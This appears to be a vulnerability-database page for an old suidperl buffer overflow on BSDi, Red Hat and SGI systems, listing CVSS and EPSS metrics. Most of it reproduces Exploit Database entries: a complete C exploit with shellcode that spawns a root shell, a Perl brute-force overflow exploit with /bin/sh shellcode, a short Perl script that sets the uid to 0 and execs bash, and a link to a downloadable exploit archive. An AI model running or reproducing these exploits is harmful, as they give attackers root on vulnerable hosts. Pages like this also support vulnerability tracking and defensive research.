Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.2 |
|
AV:L/AC:L/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 200
Publication date : 2000-11-20 23h00 +00:00
Author : vade79
EDB Verified : Yes
/* (BSDi)suidperl[] buffer overflow, by v9[
[email protected]]. this is that old
buffer overflow in suidperl, but i never saw any version of it for BSDi.
so, here it is. this gives euid=0. (BSDi/3.0)
*/
#define PATH "/usr/bin/suidperl" /* path to suidperl on BSDi/3.0. */
#define DEFAULT_OFFSET -5000 /* general offset, a lot of room. */
static char exec[]=
"\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c" /* 14 characters. */
"\x89\x76\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff" /* 14 characters. */
"\xff\xff\xff\x07\xff\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e" /* 14 characters. */
"\x2f\x73\x68\x00"; /* 4 characters; 46 characters total. */
long pointer(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
char eip[2048],buf[4096];
int i,offset;
long ret;
printf("[ (BSDi)suidperl[]: buffer overflow, by: v9[
[email protected]]. ]\n");
if(argc>1){offset=atoi(argv[1]);}
else{offset=DEFAULT_OFFSET;}
ret=(pointer()-offset);
eip[0]=0x01;
for(i=1;i<2048;i+=4){*(long *)&eip[i]=ret;}
eip[1248]=0x0;
for(i=0;i<(4096-strlen(exec)-strlen(eip));i++){*(buf+i)=0x90;}
memcpy(buf+i,exec,strlen(exec));
memcpy(buf,"EXEC=",5);putenv(buf);
printf("*** [data]: return address: 0x%lx, offset: %d.\n",ret,offset);
if(execlp(PATH,"suidperl",eip,0)){
printf("*** [error]: could not execute %s successfully.\n",PATH);
exit(1);
}
}
// milw0rm.com [2000-11-21]
Exploit Database EDB-ID : 320
Publication date : 1996-05-31 22h00 +00:00
Author : Jon Lewis
EDB Verified : Yes
#!/usr/bin/suidperl -U
$ENV{PATH}="/bin:/usr/bin";
$>=0;$<=0;
exec("/bin/bash");
# milw0rm.com [1996-06-01]
Exploit Database EDB-ID : 19546
Publication date : 1997-04-16 22h00 +00:00
Author : Pavel Kankovsky
EDB Verified : Yes
source: https://www.securityfocus.com/bid/708/info
Several buffer overflows were found in the Perl helper application 'suidperl' or 'sperl'. When this program is installed setuid root the overflows may lead to a local root compromise.
#!/usr/bin/perl
# yes, this suidperl exploit is in perl, isn't it wonderful? :)
$| = 1;
$shellcode =
"\x90" x 512 . # nops
"\xbc\xf0\xff\xff\xbf" . # movl $0xbffffff0,%esp
# "standard shellcode" by Aleph One
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" .
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
# start and end of .data
# adjust this using /proc/*/maps
$databot = 0x080a2000;
$datatop = 0x080ab000;
# trial and error loop
$address = $databot + 4;
while ($address < $datatop) {
$smash_me =
$shellcode . ('A' x (2052 - length($shellcode))) .
(pack("l", $address) x 1000) . ('B' x 1000);
$pid = fork();
if (!$pid) {
exec('/usr/bin/sperl5.003', $smash_me);
}
else {
wait;
if ($? == 0) {
printf("THE MAGIC ADDRESS WAS %08x\n", $address);
exit;
}
}
$address += 128;
}
Exploit Database EDB-ID : 19547
Publication date : 1997-04-16 22h00 +00:00
Author : Willy Tarreau
EDB Verified : Yes
source: https://www.securityfocus.com/bid/708/info
Several buffer overflows were found in the Perl helper application 'suidperl' or 'sperl'. When this program is installed setuid root the overflows may lead to a local root compromise.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19547.tgz
Products Mentioned
Configuraton 0
Larry_wall>>Perl >> Version 5.3
Sgi>>Freeware >> Version 1.0
Sgi>>Freeware >> Version 2.0
Configuraton 0
Bsdi>>Bsd_os >> Version 2.1
Bsdi>>Bsd_os >> Version 3.0
Redhat>>Linux >> Version 4.0
Redhat>>Linux >> Version 4.1
Redhat>>Linux >> Version 4.2
References